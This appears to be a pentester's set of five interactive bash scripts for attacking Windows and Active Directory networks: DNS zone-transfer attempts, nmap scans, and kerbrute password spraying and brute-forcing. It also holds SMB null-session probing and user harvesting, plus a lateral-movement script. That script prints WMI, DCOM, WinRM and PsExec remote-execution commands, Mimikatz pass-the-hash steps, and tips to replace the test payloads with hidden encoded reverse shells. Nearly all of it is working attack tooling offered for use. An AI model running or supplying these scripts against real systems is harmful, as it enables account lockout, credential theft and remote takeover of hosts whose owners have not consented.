dns_enum.sh
krb_enum.sh
port_scan.sh
smb_enum.sh
ad_LateralMove.sh
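#!/bin/bash
# dns_enum.sh - interactive dig wrapper. Reads a hostname and a DNS server IP
# from stdin, then runs an ANY query, a second query and an AXFR (zone
# transfer) attempt against that server, printing dig's output as it goes.
line="\n============================================================\n"

echo -e "[!] Tip: This queries a DNS Server, but it isn't a replacement for other DNS Enumeration techniques (e.g. fuzzing subdomains with ffuf)\n"
echo -e "\nEnter the target's hostname:"
read -r hostname    # -r: keep any backslash in the answer literal
echo -e "\nEnter the DNS Server's IP Address:"
read -r server

# Both answers are placed straight onto dig's command line; refuse empty input
# so dig is never invoked with an empty name or an empty "@" server argument.
if [[ -z "$hostname" || -z "$server" ]]; then
  echo -e "\nBoth a hostname and a DNS Server IP Address are required\n" >&2
  exit 1
fi

echo -e "$line\n[Basic DNS Queries]\n$line\nLookup any records:\n"
dig any "$hostname" @"$server"
echo -e "$line\nLookup additional DNS Server info:\n"
# NOTE(review): "all" is not a standard dig record type; confirm what this
# invocation actually queries before relying on its output.
dig all "$hostname" @"$server"
echo -e "$line\n[AXFR]\n$line\n[!] Tip: If the output shows 'Transfer failed' it means that this type of query isn't supported by the DNS Server\n\nAttempting Zone Transfer:\n"
dig axfr "$hostname" @"$server"
echo -e "$line"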
krb_enum.sh
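#!/bin/bash
# krb_enum.sh - interactive menu around kerbrute. Reads the mode, the domain,
# the DC address and the mode-specific answers from stdin, then runs the
# matching kerbrute sub-command. Each invocation is wrapped in `set -x`, so the
# exact command line (including any password typed for mode 3) is echoed.
line="\n============================================================\n"

# Exits with an error unless $1 names a readable file. Applied to every answer
# that kerbrute will open as a wordlist, so a mistyped path fails here with a
# clear message instead of inside kerbrute.
require_file() {
  if [[ ! -r "$1" ]]; then
    echo -e "\nCannot read file: $1\n" >&2
    exit 1
  fi
}

echo -e "$line\nSelect the operation to perform:\n[1] bruteuser - Bruteforce a single user's password from a wordlist"
echo -e "[2] credpairs - Read username:password combos from a file\n[3] passwordspray - Test a single password against a list of users"
echo -e "[4] userenum - Enumerate valid domain usernames via Kerberos\n[5] bruteforce - Bruteforce usenames & passwords (VERIFY IT WORKS!)"
echo -e "\n\n[!] Tip: Kerbrute can lockout accounts if that setting is enabled\n"
read -r mode
echo -e "\nSpecify the domain (e.g. xample.local):\n"
read -r dom
echo -e "\nSpecify the Domain Controller's IP Address:\n"
read -r dc
# Every mode passes both values to kerbrute; bail before asking anything else.
if [[ -z "$dom" || -z "$dc" ]]; then
  echo -e "\nA domain and a Domain Controller IP Address are required\n" >&2
  exit 1
fi

case "$mode" in
  1)
    echo -e "\nEnter the file path for the password wordlist:\n"
    read -r passwd
    echo -e "\nEnter the username to Bruteforce\n"
    read -r user
    require_file "$passwd"
    set -x
    kerbrute bruteuser -d "$dom" --dc "$dc" "$passwd" "$user"
    set +x
    ;;
  2)
    echo -e "\nEnter the file path for the credential wordlist (The format is username:password):\n"
    read -r passwd
    require_file "$passwd"
    set -x
    kerbrute bruteforce -d "$dom" --dc "$dc" "$passwd"
    set +x
    ;;
  3)
    echo -e "\nSpecify the password to spray:\n"
    read -r passwd
    echo -e "\nSpecify the file path to the username wordlist:\n"
    read -r user
    require_file "$user"
    set -x
    kerbrute passwordspray -d "$dom" --dc "$dc" "$user" "$passwd"
    set +x
    ;;
  4)
    echo -e "\nSpecify the file path to the username wordlist:\n"
    read -r user
    require_file "$user"
    echo -e "$line\n[!] Tip: kerbrute performs ASREP Roasting on vuln accounts, but the hash *isn't* in a crackable format for john. ASREP Roast with Ares instead.\n$line"
    set -x
    kerbrute userenum -d "$dom" --dc "$dc" "$user"
    set +x
    ;;
  5)
    echo -e "\nSpecify the file path to the username wordlist:\n"
    read -r user_list
    echo -e "\nEnter the file path for the password wordlist:\n"
    read -r passwd
    require_file "$user_list"
    require_file "$passwd"
    # One user per line (the old `for u in $(cat ...)` split on any whitespace).
    # The list is read on fd 3 so a child command that reads stdin cannot eat the
    # remaining lines; `|| [[ -n "$u" ]]` keeps a last line lacking a newline.
    while IFS= read -r -u 3 u || [[ -n "$u" ]]; do
      [[ -n "$u" ]] || continue   # skip blank lines
      set -x
      kerbrute bruteuser -d "$dom" --dc "$dc" "$passwd" "$u"
      set +x
      echo -e "$line"
    done 3< "$user_list"
    ;;
  *)
    echo -e "\nYou did not select a valid option\n"
    ;;
esac
echo -e "$line"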
port_scan.sh
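#!/bin/bash
# port_scan.sh - interactive nmap wrapper. Prompts on stdin for a target,
# whether to save output, an nmap timing template (1-5) and the TCP scan type,
# then runs a full TCP port scan followed by a top-1000 UDP scan under sudo.
line="\n============================================================\n"

# Runs the command given in "$@". When $1 (an output path) is non-empty the
# command's stdout is also copied into that file with tee.
# The original stored "| tee FILE" in a string and expanded it on the nmap line;
# word splitting never turns that into a pipeline, so nmap simply received
# '|', 'tee' and the file name as extra arguments and nothing was saved.
run_scan() {
  local out=$1
  shift
  if [[ -n "$out" ]]; then
    "$@" | tee -- "$out"
  else
    "$@"
  fi
}

echo -e "\nEnter target IP / hostname:\n"
read -r target
if [[ -z "$target" ]]; then
  echo -e "\nA target is required\n" >&2
  exit 1
fi
echo -e "\nSave Scan Output to file?\n[1] Yes\n[2] No\n"
read -r opt
# Re-prompt until the answer is exactly one digit from 1 to 5.
while true; do
  echo -e "\nHow fast should the scan be? Enter a timing value (1-5):\n\n[!] Tip: 3 is the default speed. Anything faster may be less reliable.\n"
  read -r timing
  if [[ "$timing" =~ ^[1-5]$ ]]; then
    break
  fi
  echo "Invalid input. Please enter a number from 1 to 5."
done
tcp_out=""
udp_out=""
if [[ "$opt" == "1" ]]; then
  tcp_out="${target}_TCP.nmap"
  udp_out="${target}_Top_UDP.nmap"
fi
echo -e "\nSpecify Scan Type for TCP Ports:\n[1] TCP-Connect\n[2] SYN-Stealth\n\n[!] Tip: Depending on config, one type of scan may be more accurate.\n"
read -r scan
echo -e "$line"
case "$scan" in
  1)
    echo -e "\nTCP-Connect Scan: All ports & default scripts used\n"
    run_scan "$tcp_out" sudo nmap -sT -p- -T"$timing" -sVC -O -Pn -vv "$target"
    ;;
  2)
    echo -e "\nTCP SYN Scan: All ports & default scripts used\n\n[!] Tip: Consider TCP Connect Scan for OSCP\n"
    echo -e "[!] Tip: Even if Nmap's output says 'Not shown: 1000 open|filtered udp ports (no-response)', there could be UDP Ports in use (i.e. SNMP on 161)\n"
    run_scan "$tcp_out" sudo nmap -p- -T"$timing" -sVC -Pn -vv "$target"
    ;;
  *)
    echo -e "\nYou did not select a valid option\n"
    # `return` is only valid inside a function or a sourced file; at script top
    # level it just prints an error and execution carries on into the UDP scan.
    exit 1
    ;;
esac
echo -e "$line"
echo -e "\nUDP Scan: Top 1000 ports\n"
run_scan "$udp_out" sudo nmap -sUV -T"$timing" -Pn -v "$target"
echo -e "$line"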
smb_enum.sh
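#!/bin/bash
# smb_enum.sh - interactive SMB enumeration menu. Reads a target and a mode
# from stdin and drives nxc, lookupsid.py, smbmap or enum4linux-ng accordingly.
# Modes 1 and 2 first fingerprint the target's hostname/domain with a null
# session so the later checks can be repeated with the domain name when one
# distinct from the hostname was seen.
line="\n============================================================\n"
target=""
domain=""
host=""
ad=0   # 1 when a domain name differing from the hostname was detected

# Prints the four default/null-credential share listings against $target,
# passing $1 as the -d value (the hostname or the domain name).
probe_shares() {
  local d=$1
  echo -e "Null Login. No creds\n"
  nxc smb "$target" -u '' -p '' -d "$d" --shares
  echo -e "$line"
  echo -e "Anonymous username & no password\n"
  nxc smb "$target" -u 'Anonymous' -p '' -d "$d" --shares
  echo -e "$line"
  echo -e "Anonymous:Anonymous\n"
  nxc smb "$target" -u 'Anonymous' -p 'Anonymous' -d "$d" --shares
  echo -e "$line"
  echo -e "Guest login\n"
  nxc smb "$target" -u 'guest' -p '' -d "$d" --shares
  echo -e "$line"
}

# Runs lookupsid.py with the given arguments, shows its full output on the
# terminal via /dev/tty, and prints on stdout only the account names from the
# SidTypeUser rows (the text between the backslash and the following " (").
extract_users() {
  lookupsid.py "$@" | tee /dev/tty | grep "SidTypeUser" | awk -F '\' '{print $2}' | awk -F ' \\(' '{print $1}'
}

# Appends $1 (zero or more newline-separated names) to the file $2; an empty
# result writes nothing, so no blank line ends up in the output.
append_users() {
  if [[ -n "$1" ]]; then
    printf '%s\n' "$1" >> "$2"
  fi
}

echo -e "\nEnter the target IP / hostname:"
read -r target
if [[ -z "$target" ]]; then
  echo -e "\nA target is required\n" >&2
  exit 1
fi
echo -e "\nSelect an operation:\n[1] Test default logins\n[2] Enumerate users via Read access to IPC$\n[3] List contents & permissions for all shares"
echo -e "[4] Enumerate Server Info (e.g. Get Account Descriptions)\n"
read -r mode

if [[ "$mode" == 1 || "$mode" == 2 ]]; then
  # Pull the domain and machine name out of nxc's banner for a null session;
  # the awk splits assume nxc prints "(domain:X)" and "(name:Y)" on that line.
  query=$(nxc smb "$target" -u '' -p '')
  domain=$(echo "$query" | grep domain | awk -F 'domain:' '{print $2}' | awk -F ')' '{print $1}')
  host=$(echo "$query" | awk -F 'name:' '{print $2}' | awk -F ')' '{print $1}')
  dom="\n[+] Using Domain: $domain\n"
  hostname="\n[+] Using Hostname: $host\n"
  if [[ "$host" == "$domain" ]]; then
    echo -e "\nThe Hostname is identical to the Domain Name\n"
  elif [[ -z "$domain" ]]; then
    echo -e "\nNo Domain Name detected\n"
  else
    ad=1
  fi
fi
echo -e "$line"

case "$mode" in
  1)
    echo -e "$hostname"
    probe_shares "$host"
    if (( ad == 1 )); then
      echo -e "$dom"
      probe_shares "$domain"
    fi
    ;;
  2)
    echo -e "\nDo you want to extract usernames & save them to a file?\n[1] No. Print results to STDOUT\n[2] Yes. Print results & then write usernames to a file\n"
    read -r opt
    if [[ "$opt" != 1 && "$opt" != 2 ]]; then
      echo -e "\nYou did not select a valid option\n"
      exit 1
    fi
    echo -e "\nEnter the Username to use (Use Syntax DOMAIN/USER or HOSTNAME/USER):\n"
    read -r user
    echo -e "\nSelect an option:\n[1] Authenticate using a password\n[2] Authenticate using an NTLM hash\n[3] Use an account that doesn't have a password\n"
    read -r cred
    # auth_opts + spec reproduce the three lookupsid.py forms of the original:
    # password inside the user@target spec, "-hashes :NT", or "-no-pass".
    auth_opts=()
    case "$cred" in
      1)
        echo -e "\nEnter the Password:\n"
        read -r pass
        spec="$user:$pass@$target"
        ;;
      2)
        echo -e "\nEnter the NTLM hash:\n"
        read -r ntlm
        auth_opts=(-hashes ":$ntlm")
        spec="$user@$target"
        ;;
      3)
        echo -e "\nConnecting using an account with a Null password\n"
        auth_opts=(-no-pass)
        spec="$user@$target"
        ;;
      *)
        echo -e "\nYou did not select a valid option\n"
        # `return` (used here originally) is an error at script top level and
        # would have let execution continue with unset credentials.
        exit 1
        ;;
    esac
    echo -e "\n[Local SIDs]\n"
    lUsers=$(extract_users "${auth_opts[@]}" "$spec")
    echo -e "$line"
    dUsers=""
    if (( ad == 1 )); then
      echo -e "\n[Domain SIDs]\n"
      dUsers=$(extract_users -domain-sids "${auth_opts[@]}" "$spec")
    fi
    if [[ "$opt" == 2 ]]; then
      echo -e "\nLocal Users: Path to output file\n"
      read -r out1
      echo -e "\nDomain Users: Path to output file (can be the same file path)\n"
      read -r out2
      if [[ -z "$out1" || -z "$out2" ]]; then
        echo -e "\nOutput file paths are required\n" >&2
        exit 1
      fi
      if [[ "$out1" == "$out2" ]]; then
        # Merge both lists through a private temp file and let duplicut
        # de-duplicate into the single output. The original appended to a fixed
        # /dev/shm path that was never removed, so names from earlier runs (or
        # written there by any other local user) leaked into the result.
        tmp=$(mktemp) || exit 1
        trap 'rm -f -- "$tmp"' EXIT
        append_users "$lUsers" "$tmp"
        append_users "$dUsers" "$tmp"
        duplicut "$tmp" -o "$out1"
      else
        append_users "$lUsers" "$out1"
        append_users "$dUsers" "$out2"
      fi
    fi
    ;;
  3)
    echo -e "\nEnter the Domain name or Hostname to use:\n"
    read -r dom
    echo -e "\nEnter the Username to use:\n"
    read -r user
    echo -e "\n\n[!] Tip: You can authenticate with a password, or with LMHASH:NTHASH (to use hashes, you must specify both seperated with a colon as shown)\n"
    echo -e "\nEnter the password or the hashes:\n"
    read -r cred
    # set -x echoes the exact command line, which includes the secret typed above.
    set -x
    smbmap -H "$target" -u "$user" -p "$cred" -d "$dom" -r
    set +x
    ;;
  4)
    # May want to specify domain with -w ?
    # echo -e "\nEnter the Domain name or Hostname to use:\n"
    # read dom
    echo -e "\n[!] Tip: If Null Sessions are supported, just enter a blank username & password\n\nEnter the Username to use:\n"
    read -r user
    echo -e "\nHow do you want to authenticate?\n[1] Password\n[2] NTLM Hash\n"
    read -r cred
    case "$cred" in
      1)
        echo -e "Enter the Password:\n"
        read -r pass
        enum4linux-ng -u "$user" -p "$pass" -R -d -A "$target"
        ;;
      2)
        echo -e "\nEnter the NTLM hash:\n"
        read -r ntlm
        enum4linux-ng -u "$user" -H "$ntlm" -R -d -A "$target"
        ;;
      *)
        echo -e "\nYou did not select a valid option\n"
        exit 1
        ;;
    esac
    ;;
  *)
    echo -e "\nYou did not select a valid option\n"
    ;;
esac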
ad_LateralMove.sh
#!/bin/bash
line="\n============================================================\n"
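#######################################
# Prompts for the target account's username and password on stdin and stores
# them in the globals `user` and `passwd` for the calling code.
# Globals:   user (written), passwd (written)
# Arguments: none
# Outputs:   prompts on stdout
#######################################
Creds()
{
  echo -e "\nEnter the target account's username without the Hostname (e.g. bob):\n"
  # -r keeps backslashes literal; without it `read` drops them, silently
  # altering any password that contains one.
  read -r user
  echo -e "\nEnter the target account's password:\n"
  read -r passwd
}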
# Main menu. Every branch below only reads answers from stdin and prints a
# command template built from them; this script runs nothing against the
# target itself. Any password entered (via Creds or `read` here) is embedded
# in clear text in the printed templates, so it lands in scrollback and in any
# terminal log.
echo -e "$line\n[!] Tip: When pivoting between hosts in the same subnet, you can often use the target's IP Address & their Hostname interchangeably.\n"
echo -e "HOWEVER, this isn't always the case (i.e. When using Sysinternals PSExec without passing credentials). If you're having trouble connecting with one of these, try using the other."
echo -e "$line\nSelect a technique:\n[1] WMI\n[2] WinRM (WinRS & PS Remoting)\n[3] DCOM\n[4] PSExec (Sysinternals)\n"
# NOTE(review): `read` without -r strips backslashes, and $mode is unquoted in
# the tests below, so an empty answer makes each `[` fail with a unary-operator
# error and falls through to the final else branch.
read mode
if [ $mode == 1 ]
then
# [1] WMI: prints a WMIC one-liner and a PowerShell CIM-session equivalent.
echo -e "\nSpecify the target's IP Address\n"
read target
Creds
echo -e "$line\n[!] Tip: There are 2 methods for RCE using WMI: WMIC & Powershell. WMIC is deprecated, but it may still be enabled for backwards compatibility\n"
echo -e "[!] Tip: These test payloads just launch the Calculator App. If they work, it'll output the PID & ReturnValue 0.\n"
echo -e "[+] After the test, substitute the calc command for a Reverse shell payload (e.g. \$Command = 'powershell -nop -w hidden -e...)\n$line\nWMIC Test Payload:\n"
echo "wmic /node:$target /user:$user /password:$passwd process call create \"calc\""
echo -e "$line\nPowershell Test Payload:\n"
# The \$ escapes keep the PowerShell variable names literal in the output;
# only $user, $passwd and $target are expanded by this shell.
echo "\$username = '$user';"
echo "\$password = '$passwd';"
echo "\$secureString = ConvertTo-SecureString \$password -AsPlaintext -Force;"
echo "\$credential = New-Object System.Management.Automation.PSCredential \$username, \$secureString;"
echo "\$Options = New-CimSessionOption -Protocol DCOM"
echo "\$Session = New-Cimsession -ComputerName $target -Credential \$credential -SessionOption \$Options"
echo "\$Command = 'calc';"
echo "Invoke-CimMethod -CimSession \$Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine =\$Command};"
elif [ $mode == 2 ]
then
# [2] WinRM: prints a winrs one-liner and a New-PSSession/Enter-PSSession snippet.
echo -e "$line\nSpecify the target's Hostname for WinRS or its IP Address for PS Remoting:\n"
read target
Creds
echo -e "\nWinRS Test Payload:\n[!] Tip: If this test works, substitute the commands for a Reverse shell payload\n\n"
echo "winrs -r:$target -u:$user -p:$passwd \"cmd /c hostname & whoami\""
echo -e "$line\nBasic PS Remoting:\n[!] Tip: Based off of output from New-PSSession, you may need to use a differnt ID number for Enter-PSSession\n\n"
echo "\$username = '$user';"
echo "\$password = '$passwd';"
echo "\$secureString = ConvertTo-SecureString \$password -AsPlaintext -Force;"
echo "\$credential = New-Object System.Management.Automation.PSCredential \$username, \$secureString;"
echo "New-PSSession -ComputerName $target -Credential \$credential"
# The session id 1 is a guess; see the tip printed above.
echo "Enter-PSSession 1"
#Is there a way to check for Special Configuration Names for PS Remoting before getting RCE, so you can use that to connect?
elif [ $mode == 3 ]
then
# [3] DCOM: no credentials are asked for; the template relies on the caller's
# current session (see the tip printed below). ENCODED_PAYLOAD is a literal
# placeholder the user has to replace.
echo -e "\nEnter the target's IP Address:\n"
read target
echo -e "$line\n[!] Tip: This DCOM method requires that your CURRENT user is a Local Admin on the current machine & the target machine\n"
echo -e "\n[!] Tip: You must run the following commands inside an Admin Powershell terminal (i.e. R Click & Run as Admin)\n"
echo "\$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application.1\",\"$target\"))"
echo "\$dcom.Document.ActiveView.ExecuteShellCommand(\"powershell\",\$null,\"powershell -nop -w hidden -e ENCODED_PAYLOAD\",\"7\")"
elif [ $mode == 4 ]
then
#Add option to output cmds for Mimikatz & Rubeus for PtH & PtT
# [4] PsExec: sub-option 1 prints PsExec lines with an explicit password,
# sub-option 2 prints a Mimikatz setup block followed by credential-less
# PsExec lines. Note this branch has its own `read user`/`read ntlm` rather
# than calling Creds.
echo -e "\n[!] Tip: PSExec can be uploaded to the target & doesn't need to be installed.\n"
echo -e "[!] Tip: If you don't supply credentials, you'll authenticate as the current user. Ergo, you can OPtH or PtT (Kerberos) by combining it with a tool like Mimikatz."
echo -e "\nSelect an option:\n[1] Use a Password\n[2] Use an NTLM Hash (OPtH Attack)\n"
read opt
if [ "$opt" == 1 ]
then
echo -e "\nEnter the target's IP Address:\n"
read target
echo -e "\nEnter the Domain (e.g.for xample.com, use xample):\n"
read dom
Creds
echo -e "$line\nInteractive Session as User:\n"
# "\\\\" prints a single UNC "\\" prefix; "$dom\\$user" prints DOMAIN\user.
echo ".\\PsExec.exe -accepteula -i \\\\$target -u $dom\\$user -p $passwd powershell"
echo -e "\nInteractive Session as SYSTEM:\n"
echo ".\\PsExec.exe -accepteula -s \\\\$target -u $dom\\$user -p $passwd powershell"
elif [ "$opt" == 2 ]
then
echo -e "\nEnter the target's Hostname for an OPtH Attack (NOT the IP Address):\n"
read target
echo -e "$line\n[Setup]\n\n1) Launch an Admin Powershell terminal & start Mimikatz\n2) privilege::debug\n"
echo -e "\nEnter the target account's username:\n"
read user
echo -e "\nEnter the Domain name (e.g. xample.com):\n"
read dom
echo -e "\nEnter the target account's NTLM Hash:\n"
read ntlm
echo -e "$line\n[PtH]\n\nsekurlsa::pth /user:$user /domain:$dom /ntlm:$ntlm /run:powershell\n"
echo -e "$line\n[OPtH]\nRequest a TGT using the new Powershell session (e.g. authenticate to an SMB Share)\n"
echo "net use \\\\$target"
echo "klist"
echo -e "$line\nInteractive Session as User:\n"
echo ".\\PsExec.exe -accepteula \\\\$target powershell"
echo -e "\nInteractive Session as SYSTEM:\n"
echo ".\\PsExec.exe -accepteula -s \\\\$target powershell"
else
echo -e "\nYou did not select a valid option\n"
# NOTE(review): bare `exit` reports status 0 here and below; `exit 1` would
# let a caller tell an invalid choice apart from a normal run.
exit
fi
else
echo -e "\nYou did not select a valid option\n"
exit
fi
echo -e "$line"